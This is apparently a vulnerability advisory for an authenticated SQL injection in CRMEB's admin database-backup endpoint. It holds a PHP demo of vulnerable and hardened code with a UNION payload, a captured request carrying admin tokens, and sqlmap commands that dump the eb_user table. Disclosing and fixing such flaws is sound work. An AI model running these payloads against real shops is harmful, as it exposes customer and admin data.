CRMEB is an open-source e-commerce (online mall) system from ZhongBang Technology (众邦科技). It is a Gitee Most Valuable Project (GVP) with 17.6K stars.
Project: https://gitee.com/ZhongBangKeJi/CRMEB
Official site: https://www.crmeb.com/
Demo: https://v6.crmeb.net/admin/
Vulnerability description: when the admin-panel database backup feature reads a table's structure, it concatenates the user-supplied tablename parameter directly into the SQL statement, with neither a parameterized query nor input validation. The result is an authenticated (post-login) SQL injection.
Severity: Medium
Prerequisite: authentication is required (a valid admin-panel session)
Code audit:
Entry: crmeb/app/adminapi/controller/v1/system/SystemDatabackup.php:53-56
Sink: crmeb/app/services/system/SystemDatabackupServices.php:65-74
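As an added illustration (not CRMEB's own code), the following self-contained PHP script shows the sink pattern the audit describes, a table name concatenated into SQL text, beside a hardened version that checks the name against the tables that actually exist and quotes the identifier. It uses an in-memory SQLite database with constructed tables and a plain SELECT so that it runs offline with only the PDO SQLite extension; the function names, table contents and injected payload are assumptions for the demonstration, not the statements CRMEB builds in SystemDatabackupServices.php, where the same whitelist check would sit in front of Db::query().

```php
<?php
// Added example, not CRMEB code: vulnerable vs. hardened handling of a
// user-supplied table name. Constructed in-memory SQLite schema so it runs
// offline; CRMEB itself runs on MySQL/ThinkPHP, where the pattern is the same.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed tables: a "user" table the backup feature is meant to read and a
// second table holding data the caller should never be able to reach.
$pdo->exec('CREATE TABLE eb_user (uid INTEGER PRIMARY KEY, account TEXT, status INTEGER)');
$pdo->exec('CREATE TABLE eb_system_admin (id INTEGER PRIMARY KEY, account TEXT, pwd TEXT)');
for ($i = 1; $i <= 5; $i++) {
    $pdo->exec("INSERT INTO eb_user VALUES ($i, 'user$i', " . ($i % 2) . ")");
}
$pdo->exec("INSERT INTO eb_system_admin VALUES (1, 'admin', 'password-hash')");

// Vulnerable pattern (hypothetical function name): the table name goes straight
// into the SQL string. Anything after the first space is parsed as SQL.
function readTableVulnerable(PDO $pdo, string $tablename): array
{
    $sql = 'SELECT * FROM ' . $tablename;   // sink: no validation, no quoting
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern (hypothetical function name): accept only a name that the
// database itself reports as a table, then quote it as an identifier so it can
// never be interpreted as anything else. A table name is an identifier, not a
// value, so a bind parameter cannot be used here; the whitelist is the control.
function readTableSafe(PDO $pdo, string $tablename): array
{
    $tables = $pdo->query("SELECT name FROM sqlite_master WHERE type = 'table'")
                  ->fetchAll(PDO::FETCH_COLUMN);
    if (!in_array($tablename, $tables, true)) {
        throw new InvalidArgumentException('unknown table: ' . $tablename);
    }
    $quoted = '`' . str_replace('`', '``', $tablename) . '`';
    return $pdo->query('SELECT * FROM ' . $quoted)->fetchAll(PDO::FETCH_ASSOC);
}

// Normal request: both variants return the constructed eb_user rows.
echo 'vulnerable, eb_user: ', count(readTableVulnerable($pdo, 'eb_user')), " rows\n";
echo 'safe, eb_user:       ', count(readTableSafe($pdo, 'eb_user')), " rows\n";

// Injected "table name" (constructed payload): the vulnerable sink appends a
// WHERE clause and a UNION, so the admin credentials row comes back with the users.
$payload = 'eb_user WHERE status = 1 UNION SELECT id, account, pwd FROM eb_system_admin';
foreach (readTableVulnerable($pdo, $payload) as $row) {
    echo 'vulnerable, payload: ', json_encode($row), "\n";
}

// The hardened read rejects the payload before any SQL is executed.
try {
    readTableSafe($pdo, $payload);
} catch (InvalidArgumentException $e) {
    echo 'safe, payload: rejected (', $e->getMessage(), ")\n";
}
```

Run it with `php example.php`. The same check in CRMEB would compare tablename against the table list obtained from the database connection before building the SHOW/SELECT statement; that also covers inputs such as the eb_user* probe used in the verification below, which is not a table name and should be refused rather than passed to MySQL.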
Verification:
- Start the service with Docker; admin panel: http://localhost:8080/admin (account: admin, password: crmeb.com).
  Click "Details" at the position shown in the figure to trigger the API endpoint.
- Verified with 1=1: 1,980 rows are returned in total, whereas a normal request returns only 55. The captured request (the admin JWT is sent in the non-standard Authori-zation header):
GET /adminapi/system/backup/read?tablename=eb_user* HTTP/1.1
Host: 10.12.169.249:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTNhNjU5YTk4NDQ4M2VjM2MzZWY5NDNhNzJmYTRmOSIsImlzcyI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImF1ZCI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImlhdCI6MTc4MTMzNDY1NiwibmJmIjoxNzgxMzM0NjU2LCJleHAiOjE3ODM5MjY2NTYsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.R-sl6jGeuJH4yJuqIERsEkNbDQ1shegG6jJj1WUo6q0
Referer: http://10.12.169.249:8080/admin/system/maintain/system_databackup/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: access_token=%22eyJraWQiOiIxMDA5ZWFjMi03YjZmLTQ1YmEtOWFjYS0wYTNhMjU5YWQ4NGMiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJuZXhpb3QiLCJhdWQiOiJ3ZWIiLCJuYmYiOjE3ODEyNDEyMTMsImlzcyI6Imh0dHA6Ly9sb2NhbGhvc3Q6OTA5MSIsImV4cCI6MTc4MTI0NDgxMywiaWF0IjoxNzgxMjQxMjEzLCJqdGkiOiI0YzlmYmQ0Yi1kYmJlLTRlMTktOTEzOS1hMzVmZGQxYjI3YTMifQ.GuwjiXQ296FuUZly4vS6wHUC0_OHWxERX1g8qSDjU6pIK6wKwSukhO9r8U4rZsz0PGAtZcjVqzIpSV_Z8AIFlLT547daQPMrdCxvH45UTopVZTO2PhKLTMHyM4N4yROrMn_Wo7wujt_4nz6e_ZD2k6D7TV-Erhe0Vusm1N2wqWeexi5e9mA8catdd3VGjsxRO8h4FtPHoccEGF-_iDYQwJSgYu1bMAmN4xUERGWGE1ohqWGJbWesQJKkE-bC74_RniE4ACMEbtDibSGgdAfr9pniKZNXnnh9XduQM0CNGqxjPZGa1lmVY2-VYHusz67KafTdyG8C2JIoMsXvzWtowQ%22; cb_lang=zh-cn; PHPSESSID=a41d331c25ccb597654d37b0f8c562df; from-crmeb-admin%3AWS_ADMIN_URL=ws://10.12.169.249:8080/notice; from-crmeb-admin%3AWS_CHAT_URL=ws://10.12.169.249:8080/msg; from-crmeb-admin%3Auuid=1; from-crmeb-admin%3Atoken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTNhNjU5YTk4NDQ4M2VjM2MzZWY5NDNhNzJmYTRmOSIsImlzcyI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImF1ZCI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImlhdCI6MTc4MTMzNDY1NiwibmJmIjoxNzgxMzM0NjU2LCJleHAiOjE3ODM5MjY2NTYsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.R-sl6jGeuJH4yJuqIERsEkNbDQ1shegG6jJj1WUo6q0; from-crmeb-admin%3Aexpires_time=1783926656
Connection: keep-alive
Save the request above as poc.txt and feed it to sqlmap: python3 sqlmap.py -r poc.txt

Dump the eb_user table from the crmeb database: python3 sqlmap.py -r poc.txt -D crmeb -T eb_user --dump